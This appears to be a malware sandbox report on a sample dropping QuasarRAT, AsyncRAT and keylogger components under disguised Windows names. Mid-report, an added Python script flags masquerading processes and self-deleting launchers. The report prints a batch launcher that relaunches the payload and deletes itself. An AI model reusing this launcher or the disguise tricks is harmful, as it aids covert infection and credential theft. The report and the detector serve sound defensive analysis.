                                                  Size (bytes):196608
                                                  Entropy (8bit):1.121297215059106
                                                  Encrypted:false
                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                  Category:dropped
                                                  Size (bytes):40960
                                                  Entropy (8bit):0.8553638852307782
                                                  Encrypted:false
                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                  Category:dropped
                                                  Size (bytes):159744
                                                  Entropy (8bit):0.5394293526345721
                                                  Encrypted:false
                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                  Category:dropped
                                                  Size (bytes):51200
                                                  Entropy (8bit):0.8746135976761988
                                                  Encrypted:false
                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                  Category:dropped
                                                  Size (bytes):155648
                                                  Entropy (8bit):0.5407252242845243
                                                  Encrypted:false
                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                  Category:dropped
                                                  Size (bytes):196608
                                                  Entropy (8bit):1.121297215059106
                                                  Encrypted:false
                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                  Category:dropped
                                                  Size (bytes):51200
                                                  Entropy (8bit):0.8746135976761988
                                                  Encrypted:false
                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                  Category:dropped
                                                  Size (bytes):155648
                                                  Entropy (8bit):0.5407252242845243
                                                  Encrypted:false
                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                  Category:dropped
                                                  Size (bytes):98304
                                                  Entropy (8bit):0.08235737944063153
                                                  Encrypted:false
                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                  Category:dropped
                                                  Size (bytes):98304
                                                  Entropy (8bit):0.08235737944063153
                                                  Encrypted:false
                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                  Category:dropped
                                                  Size (bytes):5242880
                                                  Entropy (8bit):0.03859996294213402
                                                  Encrypted:false
                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                  MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                  SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                  SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                  SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                  Category:dropped
                                                  Size (bytes):5242880
                                                  Entropy (8bit):0.03859996294213402
                                                  Encrypted:false
                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                  MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                  SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                  SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                  SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Roaming\Window Security.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):211
                                                  Entropy (8bit):5.310413226594109
                                                  Encrypted:false
                                                  SSDEEP:6:hC47bxrBeLuVFOOr+DE19aZ5lSKOZG1923fP:d5r+uVEOCDEmHlIX
                                                  MD5:14DC803A3D4CE999EE6A0DDFE7625D13
                                                  SHA1:13C7A97B0E4547070E91A4456E7E25CCE02E5D7D
                                                  SHA-256:A7D8CCF430E4FB9B4E1AA6DEA6D73716361E8BE599449AAC0BCECE227F9EE7B6
                                                  SHA-512:64AD469A5AE34E801248EB7267A4088595E96FE4110AA5E1B31827E498AAAD0ACB45A9E449EB52C1F1828496AC802A9AEC3FD36D5586558EFED90A28CEBA9EF4
                                                  Malicious:false
                                                  Preview:@echo off..chcp 65001..echo DONT CLOSE THIS WINDOW!..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Roaming\Window Security.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\xsfg46D0POZr.bat"
                                                  Process:C:\Users\user\Desktop\BTC.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):75776
                                                  Entropy (8bit):5.801146631564073
                                                  Encrypted:false
                                                  SSDEEP:1536:dU40cxhzjBCViPMVSe9VdQuDI6H1bf/6hQzceLVclN:dU1cxhzVCiPMVSe9VdQsH1bfoQ3BY
                                                  MD5:0DFA83A82F6418C73406D78296DE61BE
                                                  SHA1:DD7ECEEF8A434C43E0751E180BF714E08771D336
                                                  SHA-256:8D27369FFA8B29D561FA9DAF485BE14D2FC00287BB1C69D4C84D514891C8DB5E
                                                  SHA-512:9A4B026250B18C29AB7DD48203F321C2EF2F12695BD2DCB52EBBC15001C8DDF019D5A7E04DA056C50C1881CE269D1810259BF6D04B61F471E8751B7192FC73D4
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Cracked.exe, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attempting to enumerate video devices using WMI, Source: C:\Users\user\AppData\Roaming\Cracked.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 87%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c.............................4... ...@....@.. ....................................@.................................D4..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B.................4......H.......Py..........0....................................................W......H3.......W......3........./.\.....{....*"..}....*..{....*"..}....*..{....*"..}....*.~....(....9.....~....(....(....*.(....*n~....(....~.....(....(....*.r...p.(.....(.....@....(.....A...(....*f.~#...}......}.....($...*..($...*.~....%:....&~....../...sM...%.....sN...(O...~....(.........*.~....o....9 ...~.....(....(G...9....~.....(....*.s................s)........~J...............*.s.........*r~....o
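The records above list every dropped file together with the process that wrote it, and the overview flags two of the behaviours visible here: PE files dropped under benign system names (svchost.exe, update.exe, Window Security.exe living in AppData\Roaming rather than C:\Windows) and a batch file that waits with ping, relaunches the payload with start and deletes itself. The helper below is an added example, not part of the Joe Sandbox report or of any Joe Security tooling. It parses records in the same Field:Value shape, decodes the Preview of the dropped .bat (the sandbox prints each CRLF as "..") and applies those checks. The mimic-name token list is a heuristic assumption, and SAMPLE_RECORDS is constructed from values shown above.

```python
"""Triage helper for Joe Sandbox 'Dropped Files' records (added example)."""
import re

# Constructed sample: three records in the report's Field:Value layout.
SAMPLE_RECORDS = r"""
Process:C:\Users\user\AppData\Roaming\svchost.exe
File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000
Category:dropped
Size (bytes):5242880
Malicious:false
Preview:SQLite format 3......@ .........
Process:C:\Users\user\AppData\Roaming\Window Security.exe
File Type:DOS batch file, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):211
Malicious:false
Preview:@echo off..chcp 65001..echo DONT CLOSE THIS WINDOW!..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Roaming\Window Security.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\xsfg46D0POZr.bat"
Process:C:\Users\user\Desktop\BTC.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):75776
Malicious:true
Preview:MZ......................@.....
"""

# Heuristic (assumption): name fragments that imitate Windows components.
MIMIC_TOKENS = ("svchost", "lsass", "csrss", "update",
                "window security", "windows security", "windows defender")
WINDOWS_DIRS = ("c:\\windows\\",)  # System32 and SysWOW64 both sit under here

_PING = re.compile(r"ping\s+-n\s+(\d+)\s+\S+", re.I)
_START = re.compile(r'start\s+""\s+"([^"]+)"', re.I)
_DEL = re.compile(r'del\s+(?:/\w\s+)*"?([^"]+\.bat)"?', re.I)


def parse_records(text):
    """Split the flat dump into one dict per dropped file.
    A new record begins at every 'Process:' line (the report's convention);
    values are split on the first ':' only so drive letters survive."""
    records, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        key, sep, value = line.partition(":")
        if not sep:
            continue
        if key == "Process":
            cur = {}
            records.append(cur)
        if cur is not None:
            cur[key] = value
    return records


def masquerading_process(path):
    """True when the image name imitates a Windows component but the file
    is not under C:\\Windows (e.g. AppData\\Roaming\\svchost.exe)."""
    p = path.lower()
    if p.startswith(WINDOWS_DIRS):
        return False
    name = p.rsplit("\\", 1)[-1]
    return any(tok in name for tok in MIMIC_TOKENS)


def analyse_launcher_batch(preview):
    """Decode a .bat Preview ('..' stands for CRLF) and extract the delay,
    the relaunched binary and whether the script deletes itself."""
    cmds = [c.strip() for c in preview.split("..") if c.strip()]
    info = {"commands": cmds, "delay_s": None, "relaunches": None,
            "self_delete": False, "deletes": None}
    for c in cmds:
        m = _PING.search(c)
        if m:
            # ping -n N sends N echoes one second apart: roughly N-1 seconds
            info["delay_s"] = int(m.group(1)) - 1
            continue
        m = _START.search(c)
        if m:
            info["relaunches"] = m.group(1)
            continue
        m = _DEL.search(c)
        if m:
            info["self_delete"] = True
            info["deletes"] = m.group(1)
    return info


def triage(text):
    """Run every check over every record; returns (finding, detail) tuples."""
    findings = []
    for rec in parse_records(text):
        proc = rec.get("Process", "")
        ftype = rec.get("File Type", "")
        if masquerading_process(proc):
            findings.append(("masquerading_dropper", proc))
        if ftype.startswith("DOS batch file"):
            bat = analyse_launcher_batch(rec.get("Preview", ""))
            if bat["relaunches"] and bat["self_delete"]:
                findings.append(("self_deleting_launcher", bat["relaunches"]))
        if rec.get("Malicious") == "true" and ftype.startswith("PE32"):
            findings.append(("malicious_pe_dropped_by", proc))
    return findings


if __name__ == "__main__":
    for kind, detail in triage(SAMPLE_RECORDS):
        print(f"{kind:26} {detail}")
```

Run against a full report export the same way; the masquerading check is intentionally path-based because every dropper here carries a plausible name, so the directory is the only cheap tell.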
                                                  Process:C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):352
                                                  Entropy (8bit):7.39209892267878
                                                  Encrypted:false
                                                  SSDEEP:6:n4YBH8Amx/ZxzO7gvdEqtaXdeiTGM1qZxIfIRV0L6/ywYvK7ekWS9xkf:nSgGdETXdeiTGkeIfIbPywYvKekWRf
                                                  MD5:D2A2D3ED68BAFAD00874DA12F85A4EE1
                                                  SHA1:DAEEA4D77D3F15AEDBB5C8B80F2A4736E1495422
                                                  SHA-256:4DF53CB5AA79D3491D1F340D9CE9015A9682C6CDD480A274879C4B70A60DC57C
                                                  SHA-512:A2968BFC5586130F8E51EB38C867C528B3C06BE371792CB55E85064907E0535F90202903437BB28AF2E7F422EB6C305E4E985AB14ABE02A6C504191889D22EEC
                                                  Malicious:false
                                                  Preview:+..P.u}.T.....h...........t..sa>YH[.d....`l...$.3{AS..j.S.l......;\\nL.ZP~.|vj.<.U/........@..M,...f.t.=.P..^D.....Gq.E.=..\.k^...J....J}y...oE.?$F...2...b..z`..U (\<...Q..R..o.R/.%...N.".e.....(.<a...W^.h.6...X..Y.2...K7...v..'5W...z(.<...Q.....%.5.x....@7Fl."B..r]Y<.]...|5.o..K....:.&.a'59u..I....P`V.{7{5...Az..T..(5(..v....^...:
                                                  Process:C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Sep 3 03:15:54 2024, mtime=Tue Sep 3 03:15:54 2024, atime=Tue Sep 3 03:15:54 2024, length=44032, window=hide
                                                  Category:dropped
                                                  Size (bytes):877
                                                  Entropy (8bit):5.032082188273128
                                                  Encrypted:false
                                                  SSDEEP:12:8sIQl64f0/88CHlsY//kGjLE5OS+oWApjAwEHNEK3W+oWAHC0fmV:8szHf0k8EZ73E9+IAMd+yC0fm
                                                  MD5:A32316447B6FE9D6391A24B3F7AE1BDF
                                                  SHA1:403F13C49080ABB4E21436EA2F35B54F206F751F
                                                  SHA-256:21172DDBCD5EBF9CE82A51DAC7023EF1AB31F65F7B5120913A5DA3F9FDC4DC6C
                                                  SHA-512:39AEA454015F47F93DA376F18D3E61B8EA82C2E28A192592F41EF576E44A2C339D766858CA105F2956151A38A4934523ABBE470A4FEB428216E93F8FF55C777B
                                                  Malicious:false
                                                  Preview:L..................F.... ....k/......BG......k/...............................:..DG..Yr?.D..U..k0.&...&...... M.....t.................t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl#Y.!....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....#Y.!..Roaming.@......DWSl#Y.!....C.....................D.O.R.o.a.m.i.n.g.......2.....#Y.! .WINDOW~2.EXE..t......#Y.!#Y.!....6......................z..W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r. .S.e.r.v.i.c.e. .H.o.s.t...e.x.e.......p...............-.......o...........A.}R.....C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe..0.....\.....\.....\.....\.....\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r. .S.e.r.v.i.c.e. .H.o.s.t...e.x.e.`.......X.......936905...........hT..CrF.f4... .D.2=.b...,...W..hT..CrF.f4... .D.2=.b...,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                  Process:C:\Users\user\AppData\Roaming\Cracked.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):8
                                                  Entropy (8bit):2.75
                                                  Encrypted:false
                                                  SSDEEP:3:Rt:v
                                                  MD5:CF759E4C5F14FE3EEC41B87ED756CEA8
                                                  SHA1:C27C796BB3C2FAC929359563676F4BA1FFADA1F5
                                                  SHA-256:C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761
                                                  SHA-512:C7F832AEE13A5EB36D145F35D4464374A9E12FA2017F3C2257442D67483B35A55ECCAE7F7729243350125B37033E075EFBC2303839FD86B81B9B4DCA3626953B
                                                  Malicious:false
                                                  Preview:.5.False
                                                  Process:C:\Users\user\AppData\Roaming\Window Security.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):547328
                                                  Entropy (8bit):6.4430733404489215
                                                  Encrypted:false
                                                  SSDEEP:6144:78fG1BIgrx8kFYLTiMkbQEju0KoivMbi7DSVmh6Khe535h+GofOlblwXH/Gy3V8O:HPx7FYPiMQRcRDF4uy33ofAblwX2S
                                                  MD5:81B2C5C64951B603480D40D321540FF2
                                                  SHA1:314199AD92BAEB203F5555FF3814E9B7A4F226F8
                                                  SHA-256:B893220D33F9B8A0F98702BB577E4459792253AE651BDC18A93145CCD008AF54
                                                  SHA-512:3A57655BF7AA18A34364659553AAD26A3D5B8946B957441F5FEDEBAB5936B6BB2C71C6337837EAD486A001B6A9227437CC5C4EC4A5DE627F0E2DB10DC6AFDEA6
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_Vermin, Description: Yara detected Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Joe Security
                                                  • Rule: Windows_Trojan_Quasarrat_e52df647, Description: unknown, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: unknown
                                                  • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: xRAT_1, Description: Detects Patchwork malware, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Envrial credential stealer malware, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: INDICATOR_SUSPICIOUS_DisableWinDefender, Description: Detects executables containing artifacts associated with disabling Windows Defender, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: ditekSHen
                                                  • Rule: MALWARE_Win_QuasarRAT, Description: QuasarRAT payload, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 100%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{..f.................N..........Nl... ........@.. ....................................@..................................k..W.................................................................................... ............... ..H............text...TL... ...N.................. ..`.rsrc................P..............@..@.reloc...............X..............@..B................0l......H..........,.......h....Q...J...........................................0..........(....r...p(....s....%r...po....%ro..po....%r...po....%ro..po....%r...po....%r...p.r...p(....o....%r...po....o....(....r...p(.....s....%.o....%.o....%.o....%.o....%.o....(....&..&..*....................0..........(....r*..p(....s....%r...po....%ro..po....%r...po....%ro..po....%r...po....%r...p.r...p(....o....%r:..po....o....(....r*..p(.....s....%.o....%.o....%.o....%.o....%.o....(....&..&..*...
                                                  Process:C:\Users\user\Desktop\BTC.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):547328
                                                  Entropy (8bit):6.4430733404489215
                                                  Encrypted:false
                                                  SSDEEP:6144:78fG1BIgrx8kFYLTiMkbQEju0KoivMbi7DSVmh6Khe535h+GofOlblwXH/Gy3V8O:HPx7FYPiMQRcRDF4uy33ofAblwX2S
                                                  MD5:81B2C5C64951B603480D40D321540FF2
                                                  SHA1:314199AD92BAEB203F5555FF3814E9B7A4F226F8
                                                  SHA-256:B893220D33F9B8A0F98702BB577E4459792253AE651BDC18A93145CCD008AF54
                                                  SHA-512:3A57655BF7AA18A34364659553AAD26A3D5B8946B957441F5FEDEBAB5936B6BB2C71C6337837EAD486A001B6A9227437CC5C4EC4A5DE627F0E2DB10DC6AFDEA6
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_Vermin, Description: Yara detected Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Joe Security
                                                  • Rule: Windows_Trojan_Quasarrat_e52df647, Description: unknown, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: unknown
                                                  • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
